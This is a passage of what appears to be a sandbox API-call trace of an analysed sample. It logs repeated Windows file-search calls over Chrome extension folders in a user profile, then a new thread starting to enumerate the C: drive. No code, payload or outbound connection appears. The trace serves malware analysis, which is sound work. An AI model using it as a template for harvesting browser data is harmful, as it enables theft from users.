lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.512] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.512] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.512] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.513] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.513] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.513] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.513] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.513] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.514] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.514] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.514] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.514] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.514] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.514] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.515] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.515] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.515] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.515] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.515] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.516] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.516] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.516] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.516] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.516] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.516] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.517] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.517] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.517] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.517] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.517] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.518] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.518] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.518] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.518] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.518] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.518] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.519] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.519] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.519] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.519] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.519] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.520] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.520] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.520] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.520] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.520] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.521] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.521] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.521] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.522] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.522] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.522] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.523] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.523] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.523] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.524] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.524] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.524] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0157.524] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.525] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.525] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.525] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.526] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.526] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.527] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.527] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.527] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.527] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.527] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.528] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.528] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.528] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.528] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.528] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.529] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.529] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.529] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.529] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.529] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.529] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.530] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.530] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.530] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.530] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.530] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.531] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 Thread: id = 137 os_tid = 0x7d4 [0132.670] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x38) returned 0x20f54f8 [0132.670] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x18) returned 0x20f5538 [0132.670] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x104 [0132.670] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x108 [0132.670] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x10c [0132.670] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2267a68 [0132.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x2b4fb80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110 [0132.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x2b4fb80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x114 [0132.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2277a70 [0132.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 0xa28478 [0132.672] GetLastError () returned 0x0 [0132.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x214) returned 0x20fc508 [0132.672] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0132.673] GetCurrentThreadId () returned 0x7d4 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] 